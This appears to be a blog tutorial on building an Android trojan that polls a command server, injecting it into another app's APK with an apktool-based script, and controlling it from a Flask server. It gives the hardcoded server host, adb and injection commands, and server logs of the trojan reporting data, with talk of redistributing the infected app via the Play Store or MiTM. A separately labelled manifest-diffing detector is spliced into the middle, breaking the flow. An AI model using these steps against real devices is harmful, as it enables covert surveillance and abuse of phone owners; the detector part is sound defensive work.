Notice: this post is for educational purposes only! The purpose: how to infect and inject a trojan into an APK file, and re-upload it to your server or Google Play Store using MiTM.
This project was to make a simple trojan app, to get information from the phone or to perform some remote action with the phone (send SMS ...). The second part was to inject this trojan into another app package (APK), so the trojan can be quietly installed without the user noticing.
Dependencies: three repos are parts of this project:
– the trojan app, made with Android Studio: https://github.com/remijouannet/trojandroid_app
– the server part, to talk with the trojan: https://github.com/remijouannet/trojandroid_server
– the script to inject the trojan into an APK: https://github.com/remijouannet/trojandroid_mixapk
– get10: https://github.com/remijouannet/get10
The first thing to do is to open the project with Android Studio:
git clone git@github.com:remijouannet/trojandroid_app.git
Try to build the app and launch it on your phone. This app doesn't use any Java library that isn't included in the Android SDK, to avoid errors when it is injected into another app. The trojan configuration is hardcoded to avoid depending on any external XML.
So you're going to have to modify the code yourself if you want to test it. The only code to modify is in trojan.android.android_trojan.action; modify the following line in the class ConnectionServerThread:
this.host = "pi.remijouannet.com"; // IP or domain name of the trojan server
You can modify the "port" variable if you want, but it isn't recommended: you can get errors with a non-standard port for HTTPS.
Run the app on your phone or on the emulator (Shift+F10); the generated APK will be used later.
The app is pretty simple: it's just an infinite loop in a background service that asks the trojan server every 4000 seconds whether it has something to do; if it does, it tries to do it and sends the result back. The service is relaunched every time the user unlocks the phone.
So this is a Python script that uses the wonderful APKTOOL to inject the trojan into another APK.
The script unpacks the two APKs, then copies and modifies the smali code of the trojan into the get10 package; a few modifications in the manifest are of course necessary. After this, get10 can be repacked, installed and used without any problem.
So you have to have the trojan APK and an APK of another app (get10 for this example). A little howto I found to extract an installed app from your phone:
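Because the injection leaves its traces in the manifest (a new background service, a receiver tied to the unlock event, extra permissions), a defender can catch a repackaged APK by diffing its decoded AndroidManifest.xml against the developer's original. The script below is an added example, not part of the post or the trojandroid repos; it assumes both manifests were decoded with apktool and uses two constructed sample manifests.

```python
import xml.etree.ElementTree as ET
ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample: minimal manifest of the legitimate host app.
CLEAN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.host">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application>
    <activity android:name="com.example.host.MainActivity"/>
  </application>
</manifest>"""
# Constructed sample: same app after a polling service, an unlock receiver and SMS permission were spliced in.
SUSPECT_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.host">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application>
    <activity android:name="com.example.host.MainActivity"/>
    <service android:name="com.example.injected.PollingService"/>
    <receiver android:name="com.example.injected.UnlockReceiver">
      <intent-filter>
        <action android:name="android.intent.action.USER_PRESENT"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

def inventory(manifest_xml):
    """Return the manifest's permissions, components and intent actions as sets."""
    root = ET.fromstring(manifest_xml)
    perms = {p.get(ANDROID_NS + "name") for p in root.iter("uses-permission")}
    comps, actions = set(), set()
    app = root.find("application")
    for comp in (app if app is not None else []):
        if comp.tag in COMPONENT_TAGS:
            name = comp.get(ANDROID_NS + "name")
            comps.add((comp.tag, name))
            for act in comp.iter("action"):  # intent filters, e.g. USER_PRESENT triggers
                actions.add((name, act.get(ANDROID_NS + "name")))
    return {"permissions": perms, "components": comps, "actions": actions}

def manifest_diff(clean_xml, suspect_xml):
    """Everything declared in the suspect manifest but absent from the known-good one."""
    clean, suspect = inventory(clean_xml), inventory(suspect_xml)
    return {key: sorted(suspect[key] - clean[key]) for key in clean}

def is_repackaged(clean_xml, suspect_xml):
    """True if the suspect APK declares any permission, component or action the original lacks."""
    return any(manifest_diff(clean_xml, suspect_xml).values())
```

The same diff can be run on the apktool output of any app whose original manifest you hold, and any non-empty result is worth a closer look at the added smali.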
# ./adb shell pm list packages | grep get10
# ./adb shell pm path com.remijouannet.get10
# ./adb pull /data/app/com.remijouannet.get10-1/base.apk && mv base.apk /tmp/
7544 KB/s (3117111 bytes in 0.403s)
# mixapk.py --apks /PathTotrojandroid_app/app/build/outputs/apk/app-debug.apk /tmp/base.apk
Let's do the magic. If you didn't have any errors, you should find a file "app-final.apk" in your current directory.
If you have your phone in debug mode, you can push the APK to it with a simple adb command:
# adb install app-final.apk
The last component of the project is a simple Flask script that exposes a webservice to interact with the trojan.
The trojan launches a background service that calls the webservice continually to see if there is an action to execute (send an SMS, get the MAC address ...). If an order is given to the trojan, the answer is sent from the trojan to the server through another webservice.
By default, the Android trojan uses HTTPS, so you have to use the script ssl.sh in the repo to generate the private/public key; after that you can just launch a command to get information from the trojan.
Example to get the MAC address:
sudo androidtrojan -s /home/pi/git/trojandroid_server/ssl/ --mac -v
* Running on https://192.168.1.36:443/ (Press CTRL+C to quit)
* Restarting with stat
192.168.1.50 - - [08/Jul/2015 19:38:44] "GET /action HTTP/1.1" 200 -
192.168.1.50 - - [08/Jul/2015 19:38:45] "POST /result HTTP/1.1" 200 -
Source : https://github.com/remijouannet